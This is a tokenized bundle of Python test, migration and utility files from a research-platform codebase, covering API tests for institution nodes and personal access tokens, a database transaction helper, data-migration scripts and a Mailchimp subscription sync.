'<STR_LIT>' . format ( API_BASE , self . institution . _id ) <EOL> def test_return_all_public_nodes ( self ) : <EOL> res = self . app . get ( self . institution_node_url ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> ids = [ each [ '<STR_LIT:id>' ] for each in res . json [ '<STR_LIT:data>' ] ] <EOL> assert_in ( self . registration1 . _id , ids ) <EOL> assert_not_in ( self . registration2 . _id , ids ) <EOL> assert_not_in ( self . registration3 . _id , ids ) <EOL> def test_return_private_nodes_with_auth ( self ) : <EOL> res = self . app . get ( self . institution_node_url , auth = self . user1 . 
auth ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> ids = [ each [ '<STR_LIT:id>' ] for each in res . json [ '<STR_LIT:data>' ] ] <EOL> assert_in ( self . registration1 . _id , ids ) <EOL> assert_in ( self . registration2 . _id , ids ) <EOL> assert_not_in ( self . registration3 . _id , ids ) <EOL> def test_return_private_nodes_mixed_auth ( self ) : <EOL> res = self . app . get ( self . institution_node_url , auth = self . user2 . auth ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> ids = [ each [ '<STR_LIT:id>' ] for each in res . json [ '<STR_LIT:data>' ] ] <EOL> assert_in ( self . registration1 . _id , ids ) <EOL> assert_in ( self . registration2 . _id , ids ) <EOL> assert_in ( self . registration3 . _id , ids ) <EOL> def test_doesnt_return_retractions_without_auth ( self ) : <EOL> self . registration2 . is_public = True <EOL> self . registration2 . save ( ) <EOL> retraction = RetractedRegistrationFactory ( registration = self . registration2 , user = self . user1 ) <EOL> assert_true ( self . registration2 . is_retracted ) <EOL> res = self . app . get ( self . institution_node_url ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> ids = [ each [ '<STR_LIT:id>' ] for each in res . json [ '<STR_LIT:data>' ] ] <EOL> assert_not_in ( self . registration2 . _id , ids ) <EOL> def test_doesnt_return_retractions_with_auth ( self ) : <EOL> retraction = RetractedRegistrationFactory ( registration = self . registration2 , user = self . user1 ) <EOL> assert_true ( self . registration2 . is_retracted ) <EOL> res = self . app . get ( self . institution_node_url , auth = self . user1 . auth ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> ids = [ each [ '<STR_LIT:id>' ] for each in res . json [ '<STR_LIT:data>' ] ] <EOL> assert_not_in ( self . registration2 . _id , ids ) </s>
<s> import copy <EOL> import mock <EOL> from nose . tools import * <EOL> from website . models import User , ApiOAuth2PersonalToken <EOL> from website . util import api_v2_url <EOL> from tests . base import ApiTestCase <EOL> from tests . factories import ApiOAuth2PersonalTokenFactory , AuthUserFactory <EOL> TOKEN_LIST_URL = api_v2_url ( '<STR_LIT>' , base_route = '<STR_LIT:/>' ) <EOL> def _get_token_detail_route ( token ) : <EOL> path = "<STR_LIT>" . format ( token . _id ) <EOL> return api_v2_url ( path , base_route = '<STR_LIT:/>' ) <EOL> class TestTokenDetail ( ApiTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestTokenDetail , self ) . setUp ( ) <EOL> self . user1 = AuthUserFactory ( ) <EOL> self . user2 = AuthUserFactory ( ) <EOL> self . user1_token = ApiOAuth2PersonalTokenFactory ( owner = self . user1 , user_id = self . user1 . _id ) <EOL> self . user1_token_url = _get_token_detail_route ( self . user1_token ) <EOL> self . missing_type = { <EOL> '<STR_LIT:data>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> } <EOL> self . incorrect_type = { <EOL> '<STR_LIT:data>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> } <EOL> self . injected_scope = { <EOL> '<STR_LIT:data>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> } <EOL> self . nonsense_scope = { <EOL> '<STR_LIT:data>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> } <EOL> self . 
correct = { <EOL> '<STR_LIT:data>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> } <EOL> def test_owner_can_view ( self ) : <EOL> res = self . app . get ( self . user1_token_url , auth = self . user1 . auth ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> assert_equal ( res . json [ '<STR_LIT:data>' ] [ '<STR_LIT:id>' ] , self . user1_token . _id ) <EOL> def test_non_owner_cant_view ( self ) : <EOL> res = self . app . get ( self . user1_token_url , auth = self . user2 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> def test_returns_401_when_not_logged_in ( self ) : <EOL> res = self . app . get ( self . user1_token_url , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_owner_can_delete ( self , mock_method ) : <EOL> mock_method . return_value ( True ) <EOL> res = self . app . delete ( self . user1_token_url , auth = self . user1 . auth ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> def test_non_owner_cant_delete ( self ) : <EOL> res = self . app . delete ( self . user1_token_url , <EOL> auth = self . user2 . auth , <EOL> expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_deleting_tokens_makes_api_view_inaccessible ( self , mock_method ) : <EOL> mock_method . return_value ( True ) <EOL> res = self . app . delete ( self . user1_token_url , auth = self . user1 . auth ) <EOL> res = self . app . get ( self . user1_token_url , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_updating_one_field_should_not_blank_others_on_patch_update ( self , mock_revoke ) : <EOL> mock_revoke . return_value = True <EOL> user1_token = self . 
user1_token <EOL> new_name = "<STR_LIT>" <EOL> res = self . app . patch_json_api ( self . user1_token_url , <EOL> { '<STR_LIT:data>' : { '<STR_LIT>' : <EOL> { '<STR_LIT:name>' : new_name , '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : self . user1_token . _id , <EOL> '<STR_LIT:type>' : '<STR_LIT>' <EOL> } } , auth = self . user1 . auth ) <EOL> user1_token . reload ( ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> assert_dict_contains_subset ( { '<STR_LIT>' : user1_token . owner . _id , <EOL> '<STR_LIT:name>' : new_name , <EOL> '<STR_LIT>' : '<STR_LIT:{}>' . format ( user1_token . scopes ) , <EOL> } , <EOL> res . json [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] ) <EOL> assert_equal ( res . json [ '<STR_LIT:data>' ] [ '<STR_LIT:id>' ] , user1_token . _id ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_updating_an_instance_does_not_change_the_number_of_instances ( self , mock_revoke ) : <EOL> mock_revoke . return_value = True <EOL> new_name = "<STR_LIT>" <EOL> res = self . app . patch_json_api ( self . user1_token_url , <EOL> { '<STR_LIT:data>' : { <EOL> '<STR_LIT>' : { "<STR_LIT:name>" : new_name , '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : self . user1_token . _id , <EOL> '<STR_LIT:type>' : '<STR_LIT>' } } , auth = self . user1 . auth ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> list_url = TOKEN_LIST_URL <EOL> res = self . app . get ( list_url , auth = self . user1 . auth ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> assert_equal ( len ( res . json [ '<STR_LIT:data>' ] ) , <EOL> <NUM_LIT:1> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_deleting_token_flags_instance_inactive ( self , mock_method ) : <EOL> mock_method . return_value ( True ) <EOL> res = self . app . delete ( self . user1_token_url , auth = self . user1 . auth ) <EOL> self . user1_token . reload ( ) <EOL> assert_false ( self . user1_token . 
is_active ) <EOL> def test_read_does_not_return_token_id ( self ) : <EOL> res = self . app . get ( self . user1_token_url , auth = self . user1 . auth ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> assert_false ( res . json [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] . has_key ( '<STR_LIT>' ) ) <EOL> def test_create_with_admin_scope_fails ( self ) : <EOL> res = self . app . post_json_api ( TOKEN_LIST_URL , self . injected_scope , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> def test_create_with_fake_scope_fails ( self ) : <EOL> res = self . app . post_json_api ( TOKEN_LIST_URL , self . nonsense_scope , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> def test_update_with_admin_scope_fails ( self ) : <EOL> res = self . app . put_json_api ( self . user1_token_url , self . injected_scope , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> def test_update_with_fake_scope_fails ( self ) : <EOL> res = self . app . put_json_api ( self . user1_token_url , self . nonsense_scope , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_update_token_does_not_return_token_id ( self , mock_revoke ) : <EOL> mock_revoke . return_value = True <EOL> res = self . app . put_json_api ( self . user1_token_url , self . correct , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> assert_false ( res . json [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] . has_key ( '<STR_LIT>' ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_update_token ( self , mock_revoke ) : <EOL> mock_revoke . return_value = True <EOL> res = self . app . put_json_api ( self . user1_token_url , self . correct , auth = self . user1 . 
auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> def test_update_token_incorrect_type ( self ) : <EOL> res = self . app . put_json_api ( self . user1_token_url , self . incorrect_type , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> def test_update_token_no_type ( self ) : <EOL> res = self . app . put_json_api ( self . user1_token_url , self . missing_type , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> def test_update_token_no_attributes ( self ) : <EOL> payload = { '<STR_LIT:id>' : self . user1_token . _id , '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT:name>' : '<STR_LIT>' } <EOL> res = self . app . put_json_api ( self . user1_token_url , payload , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> def test_partial_update_token_incorrect_type ( self ) : <EOL> res = self . app . patch_json_api ( self . user1_token_url , self . incorrect_type , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> def test_partial_update_token_no_type ( self ) : <EOL> res = self . app . patch_json_api ( self . user1_token_url , self . missing_type , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> def test_partial_update_token_no_attributes ( self ) : <EOL> payload = { <EOL> '<STR_LIT:data>' : <EOL> { '<STR_LIT:id>' : self . user1_token . _id , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> res = self . app . patch_json_api ( self . user1_token_url , payload , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> def tearDown ( self ) : <EOL> super ( TestTokenDetail , self ) . tearDown ( ) <EOL> ApiOAuth2PersonalToken . 
remove ( ) <EOL> User . remove ( ) </s>
<s> import blinker <EOL> signals = blinker . Namespace ( ) <EOL> user_registered = signals . signal ( '<STR_LIT>' ) <EOL> user_confirmed = signals . signal ( '<STR_LIT>' ) <EOL> user_email_removed = signals . signal ( '<STR_LIT>' ) <EOL> user_merged = signals . signal ( '<STR_LIT>' ) <EOL> contributor_removed = signals . signal ( '<STR_LIT>' ) <EOL> node_deleted = signals . signal ( '<STR_LIT>' ) <EOL> unconfirmed_user_created = signals . signal ( '<STR_LIT>' ) </s>
<s> import logging <EOL> import functools <EOL> from pymongo . errors import OperationFailure <EOL> from framework . mongo import database as proxy_database <EOL> from framework . transactions import commands , messages , utils <EOL> logger = logging . getLogger ( __name__ ) <EOL> class TokuTransaction ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , database = None ) : <EOL> self . database = database or proxy_database <EOL> self . pending = False <EOL> def __enter__ ( self ) : <EOL> try : <EOL> commands . begin ( self . database ) <EOL> self . pending = True <EOL> except OperationFailure as error : <EOL> message = utils . get_error_message ( error ) <EOL> if messages . TRANSACTION_EXISTS_ERROR not in message : <EOL> raise <EOL> logger . warn ( '<STR_LIT>' ) <EOL> return self <EOL> def __exit__ ( self , exc_type , exc_val , exc_tb ) : <EOL> if self . pending : <EOL> if exc_type : <EOL> commands . rollback ( self . database ) <EOL> self . pending = False <EOL> raise exc_type , exc_val , exc_tb <EOL> try : <EOL> commands . commit ( self . database ) <EOL> self . pending = False <EOL> except OperationFailure as error : <EOL> message = utils . get_error_message ( error ) <EOL> if messages . LOCK_ERROR in message : <EOL> commands . rollback ( self . database ) <EOL> self . pending = False <EOL> raise <EOL> def transaction ( database = None ) : <EOL> """<STR_LIT>""" <EOL> def wrapper ( func ) : <EOL> @ functools . wraps ( func ) <EOL> def wrapped ( * args , ** kwargs ) : <EOL> with TokuTransaction ( database ) : <EOL> return func ( * args , ** kwargs ) <EOL> return wrapped <EOL> return wrapper </s>
<s> """<STR_LIT>""" <EOL> import bson <EOL> import datetime <EOL> from cStringIO import StringIO <EOL> import pymongo <EOL> from framework . mongo import database <EOL> from website import models <EOL> from website . app import app , init_app <EOL> from scripts . analytics import utils <EOL> from scripts . analytics import settings <EOL> mapper = bson . Code ( '''<STR_LIT>''' ) <EOL> reducer = bson . Code ( '''<STR_LIT>''' ) <EOL> out = { '<STR_LIT:replace>' : settings . TABULATE_LOGS_RESULTS_COLLECTION } <EOL> def run_map_reduce ( ** kwargs ) : <EOL> return database [ '<STR_LIT>' ] . map_reduce ( <EOL> mapper , <EOL> reducer , <EOL> out , <EOL> ** kwargs <EOL> ) <EOL> def main ( ) : <EOL> node = models . Node . load ( settings . TABULATE_LOGS_NODE_ID ) <EOL> user = models . User . load ( settings . TABULATE_LOGS_USER_ID ) <EOL> cutoff = datetime . datetime . utcnow ( ) - settings . TABULATE_LOGS_TIME_OFFSET <EOL> result = run_map_reduce ( query = { '<STR_LIT:date>' : { '<STR_LIT>' : cutoff } } ) <EOL> sio = StringIO ( ) <EOL> utils . make_csv ( <EOL> sio , <EOL> ( <EOL> ( row [ '<STR_LIT>' ] , row [ '<STR_LIT:value>' ] ) <EOL> for row in result . find ( ) . sort ( [ ( '<STR_LIT:value>' , pymongo . DESCENDING ) ] ) <EOL> ) , <EOL> [ '<STR_LIT:name>' , '<STR_LIT:count>' ] , <EOL> ) <EOL> utils . send_file ( settings . TABULATE_LOGS_FILE_NAME , settings . TABULATE_LOGS_CONTENT_TYPE , sio , node , user ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> init_app ( ) <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> from bson import ObjectId <EOL> from website . app import init_app <EOL> from website import models <EOL> from framework import Q <EOL> app = init_app ( ) <EOL> def impute_log_date ( dry_run = True ) : <EOL> no_date = models . NodeLog . find ( <EOL> Q ( '<STR_LIT:date>' , '<STR_LIT>' , None ) <EOL> ) <EOL> for log in no_date : <EOL> oid = ObjectId ( log . _primary_key ) <EOL> imputed_date = oid . generation_time <EOL> print u'<STR_LIT>' . format ( <EOL> imputed_date . strftime ( '<STR_LIT>' ) , <EOL> log . _primary_key , <EOL> ) <EOL> if not dry_run : <EOL> log . _fields [ '<STR_LIT:date>' ] . __set__ ( log , imputed_date , safe = True ) <EOL> log . save ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import sys <EOL> dry_run = len ( sys . argv ) == <NUM_LIT:1> or sys . argv [ <NUM_LIT:1> ] . lower ( ) not in [ '<STR_LIT:f>' , '<STR_LIT:false>' ] <EOL> impute_log_date ( dry_run = dry_run ) </s>
<s> """<STR_LIT>""" <EOL> from framework . auth . utils import impute_names <EOL> from website . app import init_app <EOL> from website import models <EOL> app = init_app ( '<STR_LIT>' , set_backends = True , routes = True ) <EOL> def impute_names ( ) : <EOL> for user in models . User . find ( ) : <EOL> parsed = impute_names ( user . fullname ) <EOL> for field , value in parsed . items ( ) : <EOL> if getattr ( user , field , None ) is None : <EOL> setattr ( user , field , value ) <EOL> user . save ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> impute_names ( ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from modularodm import Q <EOL> from website . models import NodeLog , Node , RegistrationApproval <EOL> from website . app import init_app <EOL> from scripts import utils as script_utils <EOL> from framework . mongo import database as db <EOL> from framework . transactions . context import TokuTransaction <EOL> logger = logging . getLogger ( __name__ ) <EOL> logging . basicConfig ( level = logging . INFO ) <EOL> def get_targets ( ) : <EOL> """<STR_LIT>""" <EOL> logs = NodeLog . find ( <EOL> Q ( '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' ) | <EOL> Q ( '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' ) | <EOL> Q ( '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' ) | <EOL> Q ( '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' ) | <EOL> Q ( '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' ) | <EOL> Q ( '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' ) | <EOL> Q ( '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' ) | <EOL> Q ( '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' ) | <EOL> Q ( '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' ) | <EOL> Q ( '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> return logs <EOL> def get_registered_from ( registration ) : <EOL> """<STR_LIT>""" <EOL> if registration . registered_from : <EOL> return registration . registered_from_id <EOL> else : <EOL> first_log_id = db [ '<STR_LIT>' ] . find_one ( { '<STR_LIT>' : registration . _id } ) [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> log = NodeLog . load ( first_log_id ) <EOL> return log . params . get ( '<STR_LIT>' ) or log . params . get ( '<STR_LIT>' ) <EOL> def migrate_log ( logs ) : <EOL> """<STR_LIT>""" <EOL> logs_count = logs . count ( ) <EOL> count = <NUM_LIT:0> <EOL> for log in logs : <EOL> count += <NUM_LIT:1> <EOL> node = log . params . get ( '<STR_LIT>' ) or log . params . get ( '<STR_LIT>' ) <EOL> params_node = Node . load ( node ) <EOL> if params_node . is_registration : <EOL> log . 
params [ '<STR_LIT>' ] = get_registered_from ( params_node ) <EOL> log . params [ '<STR_LIT>' ] = params_node . _id <EOL> else : <EOL> log . params [ '<STR_LIT>' ] = RegistrationApproval . load ( log . params [ '<STR_LIT>' ] ) . _get_registration ( ) . _id <EOL> log . save ( ) <EOL> logger . info ( '<STR_LIT>' . format ( count , <EOL> logs_count , log . _id , log . action , log . params [ '<STR_LIT>' ] , log . params [ '<STR_LIT>' ] ) ) <EOL> def main ( dry_run ) : <EOL> logs = get_targets ( ) <EOL> migrate_log ( logs ) <EOL> if not dry_run : <EOL> logger . info ( '<STR_LIT>' . format ( len ( logs ) ) ) <EOL> else : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import sys <EOL> script_utils . add_file_logger ( logger , __file__ ) <EOL> dry_run = '<STR_LIT>' in sys . argv <EOL> init_app ( set_backends = True , routes = False ) <EOL> with TokuTransaction ( ) : <EOL> main ( dry_run = dry_run ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from modularodm import Q <EOL> from framework . mongo import database <EOL> from framework . transactions . context import TokuTransaction <EOL> from website import settings <EOL> from website . models import Node <EOL> from website . app import init_app <EOL> from website . addons . osfstorage . model import OsfStorageFileRecord <EOL> from scripts import utils as script_utils <EOL> from scripts . osfstorage . utils import ensure_osf_files <EOL> logger = logging . getLogger ( __name__ ) <EOL> def migrate_version ( idx , file_data , record , dry_run = True ) : <EOL> version = record . versions [ idx ] <EOL> logger . info ( '<STR_LIT>' . format ( version . _id , file_data [ '<STR_LIT>' ] ) ) <EOL> if not dry_run : <EOL> version . _fields [ '<STR_LIT>' ] . __set__ ( version , file_data [ '<STR_LIT>' ] , safe = True ) <EOL> version . save ( ) <EOL> def migrate_node ( node , dry_run = True ) : <EOL> node_settings = node . get_addon ( '<STR_LIT>' ) <EOL> for path , versions in node . files_versions . iteritems ( ) : <EOL> for idx , version in enumerate ( versions ) : <EOL> logger . info ( '<STR_LIT>' . format ( path , idx , node . _id ) ) <EOL> try : <EOL> file_data = database [ '<STR_LIT>' ] . find_one ( { '<STR_LIT>' : version } ) <EOL> record = OsfStorageFileRecord . find_by_path ( file_data [ '<STR_LIT:path>' ] , node_settings ) <EOL> migrate_version ( idx , file_data , record , dry_run = dry_run ) <EOL> except Exception as error : <EOL> logger . error ( '<STR_LIT>' . format ( version , node . _id ) ) <EOL> logger . exception ( error ) <EOL> break <EOL> def get_nodes ( ) : <EOL> return Node . find ( Q ( '<STR_LIT>' , '<STR_LIT>' , None ) ) <EOL> def main ( dry_run = True ) : <EOL> nodes = get_nodes ( ) <EOL> logger . info ( '<STR_LIT>' . 
format ( len ( nodes ) ) ) <EOL> for node in nodes : <EOL> try : <EOL> with TokuTransaction ( ) : <EOL> migrate_node ( node , dry_run = dry_run ) <EOL> except Exception as error : <EOL> logger . error ( '<STR_LIT>' . format ( node . _id ) ) <EOL> logger . exception ( error ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import sys <EOL> dry_run = '<STR_LIT>' in sys . argv <EOL> if not dry_run : <EOL> script_utils . add_file_logger ( logger , __file__ ) <EOL> ensure_osf_files ( settings ) <EOL> init_app ( set_backends = True , routes = False ) <EOL> main ( dry_run = dry_run ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from modularodm import Q <EOL> from framework . auth . core import User <EOL> from website import mailchimp_utils , settings <EOL> from website . app import init_app <EOL> from tests . base import OsfTestCase <EOL> from tests . factories import UserFactory , UnconfirmedUserFactory <EOL> from nose . tools import * <EOL> import mock <EOL> import logging <EOL> from scripts import utils as script_utils <EOL> logger = logging . getLogger ( __name__ ) <EOL> GENERAL_LIST = settings . MAILCHIMP_GENERAL_LIST <EOL> def main ( dry = True ) : <EOL> init_app ( routes = False ) <EOL> users = list ( get_users ( ) ) <EOL> update_users ( users , dry = dry ) <EOL> subscribe_users ( users , dry = dry ) <EOL> def update_users ( users , dry = True ) : <EOL> for user in get_users ( ) : <EOL> if not dry : <EOL> if user . mailchimp_mailing_lists is None : <EOL> user . mailchimp_mailing_lists = { } <EOL> user . mailchimp_mailing_lists [ GENERAL_LIST ] = True <EOL> user . save ( ) <EOL> logger . info ( '<STR_LIT>' . format ( user . _id ) ) <EOL> def get_users ( ) : <EOL> """<STR_LIT>""" <EOL> return User . find ( Q ( '<STR_LIT>' , '<STR_LIT>' , True ) ) <EOL> def serialize_user ( user ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT:email>' : { '<STR_LIT:email>' : user . username } , <EOL> '<STR_LIT>' : '<STR_LIT:html>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : user . given_name , <EOL> '<STR_LIT>' : user . family_name } <EOL> } <EOL> def subscribe_users ( users , dry = True ) : <EOL> serialized = [ serialize_user ( user ) for user in users ] <EOL> m = mailchimp_utils . get_mailchimp_api ( ) <EOL> list_id = mailchimp_utils . get_list_id_from_name ( list_name = GENERAL_LIST ) <EOL> logger . info ( '<STR_LIT>' . format ( len ( users ) , GENERAL_LIST ) ) <EOL> if not dry : <EOL> subscribe_info = m . lists . 
batch_subscribe ( <EOL> id = list_id , <EOL> batch = serialized , <EOL> double_optin = False , <EOL> update_existing = True <EOL> ) <EOL> logger . info ( '<STR_LIT>' . format ( n = subscribe_info [ '<STR_LIT>' ] ) ) <EOL> class TestSyncEmail ( OsfTestCase ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( TestSyncEmail , cls ) . setUpClass ( ) <EOL> cls . _mailchimp_api_key = settings . MAILCHIMP_API_KEY <EOL> settings . MAILCHIMP_API_KEY = '<STR_LIT>' <EOL> @ classmethod <EOL> def tearDownClass ( cls ) : <EOL> super ( TestSyncEmail , cls ) . tearDownClass ( ) <EOL> settings . MAILCHIMP_API_KEY = cls . _mailchimp_api_key <EOL> cls . _mailchimp_api_key = None <EOL> def setUp ( self ) : <EOL> super ( TestSyncEmail , self ) . setUp ( ) <EOL> self . user = UserFactory ( ) <EOL> self . unconfirmed = UnconfirmedUserFactory ( ) <EOL> def test_update_users ( self ) : <EOL> users = get_users ( ) <EOL> assert_false ( self . user . mailchimp_mailing_lists ) <EOL> update_users ( users , dry = False ) <EOL> assert_equal ( self . user . mailchimp_mailing_lists , { '<STR_LIT>' : True } ) <EOL> def test_serialize_user ( self ) : <EOL> user = UserFactory ( ) <EOL> result = serialize_user ( user ) <EOL> assert_equal ( result , { '<STR_LIT:email>' : { '<STR_LIT:email>' : user . username } , <EOL> '<STR_LIT>' : '<STR_LIT:html>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : user . given_name , <EOL> '<STR_LIT>' : user . family_name } <EOL> } ) <EOL> def test_get_users ( self ) : <EOL> users = list ( get_users ( ) ) <EOL> assert_equal ( len ( users ) , <NUM_LIT:1> ) <EOL> assert_not_in ( self . unconfirmed , users ) <EOL> assert_equal ( users , [ self . user ] ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_subscribe_users_called_with_correct_arguments ( self , mock_subscribe , mock_list ) : <EOL> mock_list . 
return_value = { '<STR_LIT:data>' : [ { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT>' : GENERAL_LIST } ] } <EOL> list_id = mailchimp_utils . get_list_id_from_name ( GENERAL_LIST ) <EOL> users = list ( get_users ( ) ) <EOL> subscribe_users ( users , dry = False ) <EOL> serialized = [ serialize_user ( u ) for u in users ] <EOL> mock_subscribe . assert_called_with ( id = list_id , <EOL> batch = serialized , <EOL> double_optin = False , <EOL> update_existing = True <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_main ( self , mock_subscribe , mock_list ) : <EOL> mock_list . return_value = { '<STR_LIT:data>' : [ { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT>' : GENERAL_LIST } ] } <EOL> assert_false ( self . user . mailchimp_mailing_lists ) <EOL> main ( dry = False ) <EOL> assert_true ( self . user . mailchimp_mailing_lists [ GENERAL_LIST ] ) <EOL> mock_subscribe . assert_called ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> script_utils . add_file_logger ( logger , __file__ ) <EOL> main ( dry = '<STR_LIT>' in sys . argv ) </s>
# Tests for the registered-meta migration script (all fixture keys/values
# are masked literals in this corpus).
from nose.tools import *
from tests.base import OsfTestCase

import json

from modularodm import Q
from framework.mongo.utils import to_mongo

from website.project.model import ensure_schemas, MetaSchema, Node
from tests import factories

from scripts.migration.migrate_registered_meta import (
    main as do_migration,
    prepare_nodes
)

# Names of the five schemas exercised below (masked).
SCHEMA_NAMES = [
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>'
]

# Pre-migration metadata fixture, keyed by schema name (masked).
OLD_META = {
    '<STR_LIT>': {
        '<STR_LIT>': '<STR_LIT>',
    },
    '<STR_LIT>': {
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
    },
    '<STR_LIT>': {
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT:yes>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
